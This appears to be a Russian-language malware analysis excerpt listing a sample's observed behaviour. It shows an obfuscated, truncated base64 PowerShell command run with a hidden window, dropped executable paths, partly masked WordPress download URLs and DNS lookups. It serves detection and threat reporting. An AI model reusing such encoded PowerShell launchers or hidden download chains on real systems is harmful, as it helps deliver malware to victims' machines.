Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD UwBFAFQAIABBAGIAaQAgACAAKABbAHQAeQBwAGUAXQAoACcAUwB5AFMAdABFACcAKwAnAG0ALgBJAG8ALgBkAEkAUgBFACcAKwAnAEMAJwArACcAdAAnACsAJwBPAHIAWQAnACkAIAAgACkAIAAgADsAIAAgAFMAZQBUAC0Adg...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1584
- %TEMP%\1080603.cvr
- %HOMEPATH%\djqka4m\bgg56yt\yzsk_77.exe
- %HOMEPATH%\djqka4m\bgg56yt\yzsk_77.exe
- http://ri####lemarie.com/wp-admin/xlTWW/
- http://ri####leshadoan.com/wp-admin/Ucrkcvp/
- http://ho###chile.cl/purelove/Y4/
- http://a2####hitect.com/wp-admin/LAs0P/
- DNS ASK on###late.biz
- DNS ASK we###chieu.com
- DNS ASK sm#####tchliving.com
- DNS ASK ri####lemarie.com
- DNS ASK ri####leshadoan.com
- DNS ASK ho###chile.cl
- DNS ASK a2####hitect.com
- DNS ASK ra####erneues.eu
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD UwBFAFQAIABBAGIAaQAgACAAKABbAHQAeQBwAGUAXQAoACcAUwB5AFMAdABFACcAKwAnAG0ALgBJAG8ALgBkAEkAUgBFACcAKwAnAEMAJwArACcAdAAnACsAJwBPAHIAWQAnACkAIAAgACkAIAAgADsAIAAgAFMAZQBUAC0Adg...' (со скрытым окном)